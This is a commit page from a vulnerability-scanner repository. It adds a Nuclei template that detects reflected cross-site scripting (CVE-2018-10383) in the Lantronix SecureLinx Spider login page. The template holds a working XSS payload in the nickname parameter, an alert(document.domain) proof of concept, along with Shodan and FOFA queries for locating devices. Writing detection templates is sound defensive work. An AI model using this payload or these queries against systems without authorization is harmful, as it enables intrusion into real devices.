Merge pull request #11158 from projectdiscovery/CVE-2018-10383

Create CVE-2018-10383.yaml
patch-14
Dhiyaneshwaran 2024-11-07 18:58:02 +05:30 committed by GitHub
commit 117617e96b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 51 additions and 0 deletions

View File

@ -0,0 +1,51 @@
id: CVE-2018-10383
info:
name: Lantronix SecureLinx Spider (SLS) 2.2+ - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Lantronix SecureLinx Spider (SLS) 2.2+ devices have XSS in the auth.asp login page.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-10383.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-10383
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-10383
cwe-id: CWE-79
cpe: cpe:2.3:o:lantronix:securelinx_spider_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: lantronix
product: securelinx_spider_firmware
shodan-query: title:"Lantronix"
fofa-query: title="Lantronix"
tags: cve,cve2022,lantronix,securelinx,sls,xss
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>Lantronix", "Lantronix, Inc")'
internal: true
- raw:
- |
GET /auth.asp?nickname=%22%3E%3Cstyle%20onload%3D%22alert(document.domain)%22%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "><style onload=\"alert(document.domain)\">")'
- 'status_code == 200'
condition: and